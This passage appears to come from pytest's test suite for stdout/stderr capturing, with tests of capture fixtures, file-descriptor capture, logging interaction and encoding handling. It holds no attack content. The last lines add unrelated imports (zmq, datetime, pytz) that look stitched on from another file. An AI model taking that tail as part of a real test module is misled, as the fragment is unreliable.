def StdCaptureFD(out=True, err=True, in_=True):
    return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)


def StdCapture(out=True, err=True, in_=True):
    return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)


class TestCaptureManager(object):
    def test_getmethod_default_no_fd(self, monkeypatch):
        from _pytest.capture import pytest_addoption
        from _pytest.config import Parser
        parser = Parser()
        pytest_addoption(parser)
        default = parser._groups[0].options[0].default
        assert default == "fd" if hasattr(os, "dup") else "sys"
        parser = Parser()
        monkeypatch.delattr(os, 'dup', raising=False)
        pytest_addoption(parser)
        assert parser._groups[0].options[0].default == "sys"

    @needsosdup
    @pytest.mark.parametrize("method",
                             ['no', 'sys', pytest.mark.skipif('not hasattr(os, "dup")', 'fd')])
    def test_capturing_basic_api(self, method):
        capouter = StdCaptureFD()
        old = sys.stdout, sys.stderr, sys.stdin
        try:
            capman = CaptureManager(method)
            capman.start_global_capturing()
            outerr = capman.suspend_global_capture()
            assert outerr == ("", "")
            outerr = capman.suspend_global_capture()
            assert outerr == ("", "")
            print("hello")
            out, err = capman.suspend_global_capture()
            if method == "no":
                assert old == (sys.stdout, sys.stderr, sys.stdin)
            else:
                assert not out
            capman.resume_global_capture()
            print("hello")
            out, err = capman.suspend_global_capture()
            if method != "no":
                assert out == "hello\n"
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()

    @needsosdup
    def test_init_capturing(self):
        capouter = StdCaptureFD()
        try:
            capman = CaptureManager("fd")
            capman.start_global_capturing()
            pytest.raises(AssertionError, "capman.start_global_capturing()")
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()


@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_unicode(testdir, method):
    if hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 2):
        pytest.xfail("does not work on pypy < 2.2")
    if sys.version_info >= (3, 0):
        obj = "'b\u00f6y'"
    else:
        obj = "u'\u00f6y'"
    testdir.makepyfile("""
        # coding=utf8
        # taken from issue 227 from nosetests
        def test_unicode():
            import sys
            print (sys.stdout)
            print (%s)
    """ % obj)
    result = testdir.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines([
        "*1 passed*"
    ])


@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
    testdir.makepyfile("""
        def test_unicode():
            print ('b\\u00f6y')
    """)
    result = testdir.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines([
        "*1 passed*"
    ])


def test_collect_capturing(testdir):
    p = testdir.makepyfile("""
        print ("collect %s failure" % 13)
        import xyz42123
    """)
    result = testdir.runpytest(p)
    result.stdout.fnmatch_lines([
        "*Captured stdout*",
        "*collect 13 failure*",
    ])


class TestPerTestCapturing(object):
    def test_capture_and_fixtures(self, testdir):
        p = testdir.makepyfile("""
            def setup_module(mod):
                print ("setup module")
            def setup_function(function):
                print ("setup " + function.__name__)
            def test_func1():
                print ("in func1")
                assert 0
            def test_func2():
                print ("in func2")
                assert 0
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "setup module*",
            "setup test_func1*",
            "in func1*",
            "setup test_func2*",
            "in func2*",
        ])

    @pytest.mark.xfail(reason="unimplemented feature")
    def test_capture_scope_cache(self, testdir):
        p = testdir.makepyfile("""
            import sys
            def setup_module(func):
                print ("module-setup")
            def setup_function(func):
                print ("function-setup")
            def test_func():
                print ("in function")
                assert 0
            def teardown_function(func):
                print ("in teardown")
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*test_func():*",
            "*Captured stdout during setup*",
            "module-setup*",
            "function-setup*",
            "*Captured stdout*",
            "in teardown*",
        ])

    def test_no_carry_over(self, testdir):
        p = testdir.makepyfile("""
            def test_func1():
                print ("in func1")
            def test_func2():
                print ("in func2")
                assert 0
        """)
        result = testdir.runpytest(p)
        s = result.stdout.str()
        assert "in func1" not in s
        assert "in func2" in s

    def test_teardown_capturing(self, testdir):
        p = testdir.makepyfile("""
            def setup_function(function):
                print ("setup func1")
            def teardown_function(function):
                print ("teardown func1")
                assert 0
            def test_func1():
                print ("in func1")
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            '*teardown_function*',
            '*Captured stdout*',
            "setup func1*",
            "in func1*",
            "teardown func1*",
            # "*1 fixture failure*"
        ])

    def test_teardown_capturing_final(self, testdir):
        p = testdir.makepyfile("""
            def teardown_module(mod):
                print ("teardown module")
                assert 0
            def test_func():
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*def teardown_module(mod):*",
            "*Captured stdout*",
            "*teardown module*",
            "*1 error*",
        ])

    def test_capturing_outerr(self, testdir):
        p1 = testdir.makepyfile("""
            import sys
            def test_capturing():
                print (42)
                sys.stderr.write(str(23))
            def test_capturing_error():
                print (1)
                sys.stderr.write(str(2))
                raise ValueError
        """)
        result = testdir.runpytest(p1)
        result.stdout.fnmatch_lines([
            "*test_capturing_outerr.py .F*",
            "====* FAILURES *====",
            "____*____",
            "*test_capturing_outerr.py:8: ValueError",
            "*--- Captured stdout *call*",
            "1",
            "*--- Captured stderr *call*",
            "2",
        ])


class TestLoggingInteraction(object):
    def test_logging_stream_ownership(self, testdir):
        p = testdir.makepyfile("""
            def test_logging():
                import logging
                import pytest
                stream = capture.CaptureIO()
                logging.basicConfig(stream=stream)
                stream.close() # to free memory/release resources
        """)
        result = testdir.runpytest_subprocess(p)
        assert result.stderr.str().find("atexit") == -1

    def test_logging_and_immediate_setupteardown(self, testdir):
        p = testdir.makepyfile("""
            import logging
            def setup_function(function):
                logging.warn("hello1")

            def test_logging():
                logging.warn("hello2")
                assert 0

            def teardown_function(function):
                logging.warn("hello3")
                assert 0
        """)
        for optargs in (('--capture=sys',), ('--capture=fd',)):
            print(optargs)
            result = testdir.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines([
                "*WARN*hello3",  # errors show first!
                "*WARN*hello1",
                "*WARN*hello2",
            ])
            # verify proper termination
            assert "closed" not in s

    def test_logging_and_crossscope_fixtures(self, testdir):
        p = testdir.makepyfile("""
            import logging
            def setup_module(function):
                logging.warn("hello1")

            def test_logging():
                logging.warn("hello2")
                assert 0

            def teardown_module(function):
                logging.warn("hello3")
                assert 0
        """)
        for optargs in (('--capture=sys',), ('--capture=fd',)):
            print(optargs)
            result = testdir.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines([
                "*WARN*hello3",  # errors come first
                "*WARN*hello1",
                "*WARN*hello2",
            ])
            # verify proper termination
            assert "closed" not in s

    def test_conftestlogging_is_shown(self, testdir):
        testdir.makeconftest("""
                import logging
                logging.basicConfig()
                logging.warn("hello435")
        """)
        # make sure that logging is still captured in tests
        result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
        assert result.ret == EXIT_NOTESTSCOLLECTED
        result.stderr.fnmatch_lines([
            "WARNING*hello435*",
        ])
        assert 'operation on closed file' not in result.stderr.str()

    def test_conftestlogging_and_test_logging(self, testdir):
        testdir.makeconftest("""
                import logging
                logging.basicConfig()
        """)
        # make sure that logging is still captured in tests
        p = testdir.makepyfile("""
            def test_hello():
                import logging
                logging.warn("hello433")
                assert 0
        """)
        result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
        assert result.ret != 0
        result.stdout.fnmatch_lines([
            "WARNING*hello433*",
        ])
        assert 'something' not in result.stderr.str()
        assert 'operation on closed file' not in result.stderr.str()


class TestCaptureFixture(object):
    @pytest.mark.parametrize("opt", [[], ["-s"]])
    def test_std_functional(self, testdir, opt):
        reprec = testdir.inline_runsource("""
            def test_hello(capsys):
                print (42)
                out, err = capsys.readouterr()
                assert out.startswith("42")
        """, *opt)
        reprec.assertoutcome(passed=1)

    def test_capsyscapfd(self, testdir):
        p = testdir.makepyfile("""
            def test_one(capsys, capfd):
                pass
            def test_two(capfd, capsys):
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*ERROR*setup*test_one*",
            "E*capfd*capsys*same*time*",
            "*ERROR*setup*test_two*",
            "E*capsys*capfd*same*time*",
            "*2 error*"])

    def test_capturing_getfixturevalue(self, testdir):
        """Test that asking for "capfd" and "capsys" using request.getfixturevalue
        in the same test is an error.
        """
        testdir.makepyfile("""
            def test_one(capsys, request):
                request.getfixturevalue("capfd")
            def test_two(capfd, request):
                request.getfixturevalue("capsys")
        """)
        result = testdir.runpytest()
        result.stdout.fnmatch_lines([
            "*test_one*",
            "*capsys*capfd*same*time*",
            "*test_two*",
            "*capfd*capsys*same*time*",
            "*2 failed in*",
        ])

    def test_capsyscapfdbinary(self, testdir):
        p = testdir.makepyfile("""
            def test_one(capsys, capfdbinary):
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*ERROR*setup*test_one*",
            "E*capfdbinary*capsys*same*time*",
            "*1 error*"])

    @pytest.mark.parametrize("method", ["sys", "fd"])
    def test_capture_is_represented_on_failure_issue128(self, testdir, method):
        p = testdir.makepyfile("""
            def test_hello(cap%s):
                print ("xxx42xxx")
                assert 0
        """ % method)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "xxx42xxx",
        ])

    @needsosdup
    def test_stdfd_functional(self, testdir):
        reprec = testdir.inline_runsource("""
            def test_hello(capfd):
                import os
                os.write(1, "42".encode('ascii'))
                out, err = capfd.readouterr()
                assert out.startswith("42")
                capfd.close()
        """)
        reprec.assertoutcome(passed=1)

    @needsosdup
    def test_capfdbinary(self, testdir):
        reprec = testdir.inline_runsource("""
            def test_hello(capfdbinary):
                import os
                # some likely un-decodable bytes
                os.write(1, b'\\xfe\\x98\\x20')
                out, err = capfdbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
        """)
        reprec.assertoutcome(passed=1)

    @pytest.mark.skipif(
        sys.version_info < (3,),
        reason='only have capsysbinary in python 3',
    )
    def test_capsysbinary(self, testdir):
        reprec = testdir.inline_runsource("""
            def test_hello(capsysbinary):
                import sys
                # some likely un-decodable bytes
                sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
                out, err = capsysbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
        """)
        reprec.assertoutcome(passed=1)

    @pytest.mark.skipif(
        sys.version_info >= (3,),
        reason='only have capsysbinary in python 3',
    )
    def test_capsysbinary_forbidden_in_python2(self, testdir):
        testdir.makepyfile("""
            def test_hello(capsysbinary):
                pass
        """)
        result = testdir.runpytest()
        result.stdout.fnmatch_lines([
            "*test_hello*",
            "*capsysbinary is only supported on python 3*",
            "*1 error in*",
        ])

    def test_partial_setup_failure(self, testdir):
        p = testdir.makepyfile("""
            def test_hello(capsys, missingarg):
                pass
        """)
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines([
            "*test_partial_setup_failure*",
            "*1 error*",
        ])

    @needsosdup
    def test_keyboardinterrupt_disables_capturing(self, testdir):
        p = testdir.makepyfile("""
            def test_hello(capfd):
                import os
                os.write(1, str(42).encode('ascii'))
                raise KeyboardInterrupt()
        """)
        result = testdir.runpytest_subprocess(p)
        result.stdout.fnmatch_lines([
            "*KeyboardInterrupt*"
        ])
        assert result.ret == 2

    @pytest.mark.issue14
    def test_capture_and_logging(self, testdir):
        p = testdir.makepyfile("""
            import logging
            def test_log(capsys):
                logging.error('x')
            """)
        result = testdir.runpytest_subprocess(p)
        assert 'closed' not in result.stderr.str()

    @pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
    @pytest.mark.parametrize('no_capture', [True, False])
    def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
        testdir.makepyfile("""
            def test_disabled({fixture}):
                print('captured before')
                with {fixture}.disabled():
                    print('while capture is disabled')
                print('captured after')
                assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')

            def test_normal():
                print('test_normal executed')
        """.format(fixture=fixture))
        args = ('-s',) if no_capture else ()
        result = testdir.runpytest_subprocess(*args)
        result.stdout.fnmatch_lines("""
            *while capture is disabled*
        """)
        assert 'captured before' not in result.stdout.str()
        assert 'captured after' not in result.stdout.str()
        if no_capture:
            assert 'test_normal executed' in result.stdout.str()
        else:
            assert 'test_normal executed' not in result.stdout.str()

    @pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
    def test_fixture_use_by_other_fixtures(self, testdir, fixture):
        """
        Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
        """
        testdir.makepyfile("""
            from __future__ import print_function
            import sys
            import pytest

            @pytest.fixture
            def captured_print({fixture}):
                print('stdout contents begin')
                print('stderr contents begin', file=sys.stderr)
                out, err = {fixture}.readouterr()

                yield out, err

                print('stdout contents end')
                print('stderr contents end', file=sys.stderr)
                out, err = {fixture}.readouterr()
                assert out == 'stdout contents end\\n'
                assert err == 'stderr contents end\\n'

            def test_captured_print(captured_print):
                out, err = captured_print
                assert out == 'stdout contents begin\\n'
                assert err == 'stderr contents begin\\n'
        """.format(fixture=fixture))
        result = testdir.runpytest_subprocess()
        result.stdout.fnmatch_lines("*1 passed*")
        assert 'stdout contents begin' not in result.stdout.str()
        assert 'stderr contents begin' not in result.stdout.str()


def test_setup_failure_does_not_kill_capturing(testdir):
    sub1 = testdir.mkpydir("sub1")
    sub1.join("conftest.py").write(_pytest._code.Source("""
        def pytest_runtest_setup(item):
            raise ValueError(42)
    """))
    sub1.join("test_mod.py").write("def test_func1(): pass")
    result = testdir.runpytest(testdir.tmpdir, '--traceconfig')
    result.stdout.fnmatch_lines([
        "*ValueError(42)*",
        "*1 error*"
    ])


def test_fdfuncarg_skips_on_no_osdup(testdir):
    testdir.makepyfile("""
        import os
        if hasattr(os, 'dup'):
            del os.dup
        def test_hello(capfd):
            pass
    """)
    result = testdir.runpytest_subprocess("--capture=no")
    result.stdout.fnmatch_lines([
        "*1 skipped*"
    ])


def test_capture_conftest_runtest_setup(testdir):
    testdir.makeconftest("""
        def pytest_runtest_setup():
            print ("hello19")
    """)
    testdir.makepyfile("def test_func(): pass")
    result = testdir.runpytest()
    assert result.ret == 0
    assert 'hello19' not in result.stdout.str()


def test_capture_badoutput_issue412(testdir):
    testdir.makepyfile("""
        import os

        def test_func():
            omg = bytearray([1,129,1])
            os.write(1, omg)
            assert 0
        """)
    result = testdir.runpytest('--cap=fd')
    result.stdout.fnmatch_lines('''
        *def test_func*
        *assert 0*
        *Captured*
        *1 failed*
    ''')


def test_capture_early_option_parsing(testdir):
    testdir.makeconftest("""
        def pytest_runtest_setup():
            print ("hello19")
    """)
    testdir.makepyfile("def test_func(): pass")
    result = testdir.runpytest("-vs")
    assert result.ret == 0
    assert 'hello19' in result.stdout.str()


def test_capture_binary_output(testdir):
    testdir.makepyfile(r"""
        import pytest

        def test_a():
            import sys
            import subprocess
            subprocess.call([sys.executable, __file__])

        def test_foo():
            import os;os.write(1, b'\xc3')

        if __name__ == '__main__':
            test_foo()
        """)
    result = testdir.runpytest('--assert=plain')
    result.assert_outcomes(passed=2)


def test_error_during_readouterr(testdir):
    """Make sure we suspend capturing if errors occur during readouterr"""
    testdir.makepyfile(pytest_xyz="""
        from _pytest.capture import FDCapture
        def bad_snap(self):
            raise Exception('boom')
        assert FDCapture.snap
        FDCapture.snap = bad_snap
    """)
    result = testdir.runpytest_subprocess(
        "-p", "pytest_xyz", "--version", syspathinsert=True
    )
    result.stderr.fnmatch_lines([
        "*in bad_snap",
        "    raise Exception('boom')",
        "Exception: boom",
    ])


class TestCaptureIO(object):
    def test_text(self):
        f = capture.CaptureIO()
        f.write("hello")
        s = f.getvalue()
        assert s == "hello"
        f.close()

    def test_unicode_and_str_mixture(self):
        f = capture.CaptureIO()
        if sys.version_info >= (3, 0):
            f.write("\u00f6")
            pytest.raises(TypeError, "f.write(bytes('hello', 'UTF-8'))")
        else:
            f.write(unicode("\u00f6", 'UTF-8'))
            f.write("hello")  # bytes
            s = f.getvalue()
            f.close()
            assert isinstance(s, unicode)

    @pytest.mark.skipif(
        sys.version_info[0] == 2,
        reason='python 3 only behaviour',
    )
    def test_write_bytes_to_buffer(self):
        """In python3, stdout / stderr are text io wrappers (exposing a buffer
        property of the underlying bytestream).  See issue #1407
        """
        f = capture.CaptureIO()
        f.buffer.write(b'foo\r\n')
        assert f.getvalue() == 'foo\r\n'


def test_bytes_io():
    f = py.io.BytesIO()
    f.write(tobytes("hello"))
    pytest.raises(TypeError, "f.write(totext('hello'))")
    s = f.getvalue()
    assert s == tobytes("hello")


def test_dontreadfrominput():
    from _pytest.capture import DontReadFromInput
    f = DontReadFromInput()
    assert not f.isatty()
    pytest.raises(IOError, f.read)
    pytest.raises(IOError, f.readlines)
    pytest.raises(IOError, iter, f)
    pytest.raises(UnsupportedOperation, f.fileno)
    f.close()  # just for completeness


@pytest.mark.skipif('sys.version_info < (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python3():
    from _pytest.capture import DontReadFromInput
    f = DontReadFromInput()
    fb = f.buffer
    assert not fb.isatty()
    pytest.raises(IOError, fb.read)
    pytest.raises(IOError, fb.readlines)
    pytest.raises(IOError, iter, fb)
    pytest.raises(ValueError, fb.fileno)
    f.close()  # just for completeness


@pytest.mark.skipif('sys.version_info >= (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python2():
    from _pytest.capture import DontReadFromInput
    f = DontReadFromInput()
    with pytest.raises(AttributeError):
        f.buffer
    f.close()  # just for completeness


@pytest.yield_fixture
def tmpfile(testdir):
    f = testdir.makepyfile("").open('wb+')
    yield f
    if not f.closed:
        f.close()


@needsosdup
def test_dupfile(tmpfile):
    flist = []
    for i in range(5):
        nf = capture.safe_text_dupfile(tmpfile, "wb")
        assert nf != tmpfile
        assert nf.fileno() != tmpfile.fileno()
        assert nf not in flist
        print(i, end="", file=nf)
        flist.append(nf)

    fname_open = flist[0].name
    assert fname_open == repr(flist[0].buffer)

    for i in range(5):
        f = flist[i]
        f.close()
    fname_closed = flist[0].name
    assert fname_closed == repr(flist[0].buffer)
    assert fname_closed != fname_open
    tmpfile.seek(0)
    s = tmpfile.read()
    assert "01234" in repr(s)
    tmpfile.close()
    assert fname_closed == repr(flist[0].buffer)


def test_dupfile_on_bytesio():
    io = py.io.BytesIO()
    f = capture.safe_text_dupfile(io, "wb")
    f.write("hello")
    assert io.getvalue() == b"hello"
    assert 'BytesIO object' in f.name


def test_dupfile_on_textio():
    io = py.io.TextIO()
    f = capture.safe_text_dupfile(io, "wb")
    f.write("hello")
    assert io.getvalue() == "hello"
    assert not hasattr(f, 'name')


@contextlib.contextmanager
def lsof_check():
    pid = os.getpid()
    try:
        out = py.process.cmdexec("lsof -p %d" % pid)
    except (py.process.cmdexec.Error, UnicodeDecodeError):
        # about UnicodeDecodeError, see note on pytester
        pytest.skip("could not run 'lsof'")
    yield
    out2 = py.process.cmdexec("lsof -p %d" % pid)
    len1 = len([x for x in out.split("\n") if "REG" in x])
    len2 = len([x for x in out2.split("\n") if "REG" in x])
    assert len2 < len1 + 3, out2


class TestFDCapture(object):
    pytestmark = needsosdup

    def test_simple(self, tmpfile):
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        data = tobytes("hello")
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        assert not s
        cap = capture.FDCapture(fd)
        cap.start()
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        assert s == "hello"

    def test_simple_many(self, tmpfile):
        for i in range(10):
            self.test_simple(tmpfile)

    def test_simple_many_check_open_files(self, testdir):
        with lsof_check():
            with testdir.makepyfile("").open('wb+') as tmpfile:
                self.test_simple_many(tmpfile)

    def test_simple_fail_second_start(self, tmpfile):
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        cap.done()
        pytest.raises(ValueError, cap.start)

    def test_stderr(self):
        cap = capture.FDCapture(2)
        cap.start()
        print("hello", file=sys.stderr)
        s = cap.snap()
        cap.done()
        assert s == "hello\n"

    def test_stdin(self, tmpfile):
        cap = capture.FDCapture(0)
        cap.start()
        x = os.read(0, 100).strip()
        cap.done()
        assert x == tobytes('')

    def test_writeorg(self, tmpfile):
        data1, data2 = tobytes("foo"), tobytes("bar")
        cap = capture.FDCapture(tmpfile.fileno())
        cap.start()
        tmpfile.write(data1)
        tmpfile.flush()
        cap.writeorg(data2)
        scap = cap.snap()
        cap.done()
        assert scap == totext(data1)
        with open(tmpfile.name, 'rb') as stmp_file:
            stmp = stmp_file.read()
            assert stmp == data2

    def test_simple_resume_suspend(self, tmpfile):
        with saved_fd(1):
            cap = capture.FDCapture(1)
            cap.start()
            data = tobytes("hello")
            os.write(1, data)
            sys.stdout.write("whatever")
            s = cap.snap()
            assert s == "hellowhatever"
            cap.suspend()
            os.write(1, tobytes("world"))
            sys.stdout.write("qlwkej")
            assert not cap.snap()
            cap.resume()
            os.write(1, tobytes("but now"))
            sys.stdout.write(" yes\n")
            s = cap.snap()
            assert s == "but now yes\n"
            cap.suspend()
            cap.done()
            pytest.raises(AttributeError, cap.suspend)


@contextlib.contextmanager
def saved_fd(fd):
    new_fd = os.dup(fd)
    try:
        yield
    finally:
        os.dup2(new_fd, fd)
        os.close(new_fd)


class TestStdCapture(object):
    captureclass = staticmethod(StdCapture)

    @contextlib.contextmanager
    def getcapture(self, **kw):
        cap = self.__class__.captureclass(**kw)
        cap.start_capturing()
        try:
            yield cap
        finally:
            cap.stop_capturing()

    def test_capturing_done_simple(self):
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"

    def test_capturing_reset_simple(self):
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
        assert out == "hello world\n"
        assert err == "hello error\n"

    def test_capturing_readouterr(self):
        with self.getcapture() as cap:
            print("hello world")
            sys.stderr.write("hello error\n")
            out, err = cap.readouterr()
            assert out == "hello world\n"
            assert err == "hello error\n"
            sys.stderr.write("error2")
            out, err = cap.readouterr()
        assert err == "error2"

    def test_capture_results_accessible_by_attribute(self):
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            capture_result = cap.readouterr()
        assert capture_result.out == "hello"
        assert capture_result.err == "world"

    def test_capturing_readouterr_unicode(self):
        with self.getcapture() as cap:
            print("hx\xc4\x85\xc4\x87")
            out, err = cap.readouterr()
        assert out == py.builtin._totext("hx\xc4\x85\xc4\x87\n", "utf8")

    @pytest.mark.skipif('sys.version_info >= (3,)',
                        reason='text output different for bytes on python3')
    def test_capturing_readouterr_decode_error_handling(self):
        with self.getcapture() as cap:
            # triggered a internal error in pytest
            print('\xa6')
            out, err = cap.readouterr()
        assert out == py.builtin._totext('\ufffd\n', 'unicode-escape')

    def test_reset_twice_error(self):
        with self.getcapture() as cap:
            print("hello")
            out, err = cap.readouterr()
        pytest.raises(ValueError, cap.stop_capturing)
        assert out == "hello\n"
        assert not err

    def test_capturing_modify_sysouterr_in_between(self):
        oldout = sys.stdout
        olderr = sys.stderr
        with self.getcapture() as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            sys.stdout = capture.CaptureIO()
            sys.stderr = capture.CaptureIO()
            print("not seen")
            sys.stderr.write("not seen\n")
            out, err = cap.readouterr()
        assert out == "hello"
        assert err == "world"
        assert sys.stdout == oldout
        assert sys.stderr == olderr

    def test_capturing_error_recursive(self):
        with self.getcapture() as cap1:
            print("cap1")
            with self.getcapture() as cap2:
                print("cap2")
                out2, err2 = cap2.readouterr()
                out1, err1 = cap1.readouterr()
        assert out1 == "cap1\n"
        assert out2 == "cap2\n"

    def test_just_out_capture(self):
        with self.getcapture(out=True, err=False) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert out == "hello"
        assert not err

    def test_just_err_capture(self):
        with self.getcapture(out=False, err=True) as cap:
            sys.stdout.write("hello")
            sys.stderr.write("world")
            out, err = cap.readouterr()
        assert err == "world"
        assert not out

    def test_stdin_restored(self):
        old = sys.stdin
        with self.getcapture(in_=True):
            newstdin = sys.stdin
        assert newstdin != sys.stdin
        assert sys.stdin is old

    def test_stdin_nulled_by_default(self):
        print("XXX this test may well hang instead of crashing")
        print("XXX which indicates an error in the underlying capturing")
        print("XXX mechanisms")
        with self.getcapture():
            pytest.raises(IOError, "sys.stdin.read()")


class TestStdCaptureFD(TestStdCapture):
    pytestmark = needsosdup
    captureclass = staticmethod(StdCaptureFD)

    def test_simple_only_fd(self, testdir):
        testdir.makepyfile("""
            import os
            def test_x():
                os.write(1, "hello\\n".encode("ascii"))
                assert 0
        """)
        result = testdir.runpytest_subprocess()
        result.stdout.fnmatch_lines("""
            *test_x*
            *assert 0*
            *Captured stdout*
        """)

    def test_intermingling(self):
        with self.getcapture() as cap:
            oswritebytes(1, "1")
            sys.stdout.write(str(2))
            sys.stdout.flush()
            oswritebytes(1, "3")
            oswritebytes(2, "a")
            sys.stderr.write("b")
            sys.stderr.flush()
            oswritebytes(2, "c")
            out, err = cap.readouterr()
        assert out == "123"
        assert err == "abc"

    def test_many(self, capfd):
        with lsof_check():
            for i in range(10):
                cap = StdCaptureFD()
                cap.stop_capturing()


class TestStdCaptureFDinvalidFD(object):
    pytestmark = needsosdup

    def test_stdcapture_fd_invalid_fd(self, testdir):
        testdir.makepyfile("""
            import os
            from _pytest import capture
            def StdCaptureFD(out=True, err=True, in_=True):
                return capture.MultiCapture(out, err, in_,
                                              Capture=capture.FDCapture)
            def test_stdout():
                os.close(1)
                cap = StdCaptureFD(out=True, err=False, in_=False)
                cap.stop_capturing()
            def test_stderr():
                os.close(2)
                cap = StdCaptureFD(out=False, err=True, in_=False)
                cap.stop_capturing()
            def test_stdin():
                os.close(0)
                cap = StdCaptureFD(out=False, err=False, in_=True)
                cap.stop_capturing()
        """)
        result = testdir.runpytest_subprocess("--capture=fd")
        assert result.ret == 0
        assert result.parseoutcomes()['passed'] == 3


def test_capture_not_started_but_reset():
    capsys = StdCapture()
    capsys.stop_capturing()


def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
    test_text = 'test text'

    print(test_text.encode(sys.stdout.encoding, 'replace'))
    (out, err) = capsys.readouterr()
    assert out
    assert err == ''


def test_capsys_results_accessible_by_attribute(capsys):
    sys.stdout.write("spam")
    sys.stderr.write("eggs")
    capture_result = capsys.readouterr()
    assert capture_result.out == "spam"
    assert capture_result.err == "eggs"


@needsosdup
@pytest.mark.parametrize('use', [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
    if not use:
        tmpfile = True
    cap = StdCaptureFD(out=False, err=tmpfile)
    try:
        cap.start_capturing()
        capfile = cap.err.tmpfile
        cap.readouterr()
    finally:
        cap.stop_capturing()
    capfile2 = cap.err.tmpfile
    assert capfile2 == capfile


@needsosdup
def test_close_and_capture_again(testdir):
    testdir.makepyfile("""
        import os
        def test_close():
            os.close(1)
        def test_capture_again():
            os.write(1, b"hello\\n")
            assert 0
    """)
    result = testdir.runpytest_subprocess()
    result.stdout.fnmatch_lines("""
        *test_capture_again*
        *assert 0*
        *stdout*
        *hello*
    """)


@pytest.mark.parametrize('method', ['SysCapture', 'FDCapture'])
def test_capturing_and_logging_fundamentals(testdir, method):
    if method == "StdCaptureFD" and not hasattr(os, 'dup'):
        pytest.skip("need os.dup")
    # here we check a fundamental feature
    p = testdir.makepyfile("""
        import sys, os
        import py, logging
        from _pytest import capture
        cap = capture.MultiCapture(out=False, in_=False,
                                     Capture=capture.%s)
        cap.start_capturing()

        logging.warn("hello1")
        outerr = cap.readouterr()
        print ("suspend, captured %%s" %%(outerr,))
        logging.warn("hello2")

        cap.pop_outerr_to_orig()
        logging.warn("hello3")

        outerr = cap.readouterr()
        print ("suspend2, captured %%s" %% (outerr,))
    """ % (method,))
    result = testdir.runpython(p)
    result.stdout.fnmatch_lines("""
        suspend, captured*hello1*
        suspend2, captured*WARNING:root:hello3*
    """)
    result.stderr.fnmatch_lines("""
        WARNING:root:hello2
    """)
    assert "atexit" not in result.stderr.str()


def test_error_attribute_issue555(testdir):
    testdir.makepyfile("""
        import sys
        def test_capattr():
            assert sys.stdout.errors == "strict"
            assert sys.stderr.errors == "strict"
    """)
    reprec = testdir.inline_run()
    reprec.assertoutcome(passed=1)


@pytest.mark.skipif(not sys.platform.startswith('win') and sys.version_info[:2] >= (3, 6),
                    reason='only py3.6+ on windows')
def test_py36_windowsconsoleio_workaround_non_standard_streams():
    """
    Ensure _py36_windowsconsoleio_workaround function works with objects that
    do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
    """
    from _pytest.capture import _py36_windowsconsoleio_workaround

    class DummyStream(object):
        def write(self, s):
            pass

    stream = DummyStream()
    _py36_windowsconsoleio_workaround(stream)


def test_dontreadfrominput_has_encoding(testdir):
    testdir.makepyfile("""
        import sys
        def test_capattr():
            # should not raise AttributeError
            assert sys.stdout.encoding
            assert sys.stderr.encoding
    """)
    reprec = testdir.inline_run()
    reprec.assertoutcome(passed=1)


def test_crash_on_closing_tmpfile_py27(testdir):
    testdir.makepyfile('''
        from __future__ import print_function
        import time
        import threading
        import sys

        def spam():
            f = sys.stderr
            while True:
                print('.', end='', file=f)

        def test_silly():
            t = threading.Thread(target=spam)
            t.daemon = True
            t.start()
            time.sleep(0.5)

    ''')
    result = testdir.runpytest_subprocess()
    assert result.ret == 0
    assert 'IOError' not in result.stdout.str()


def test_pickling_and_unpickling_encoded_file():
    # See https://bitbucket.org/pytest-dev/pytest/pull-request/194
    # pickle.loads() raises infinite recursion if
    # EncodedFile.__getattr__ is not implemented properly
    ef = capture.EncodedFile(None, None)
    ef_as_str = pickle.dumps(ef)
    pickle.loads(ef_as_str)

import zmq
import datetime
import pytz

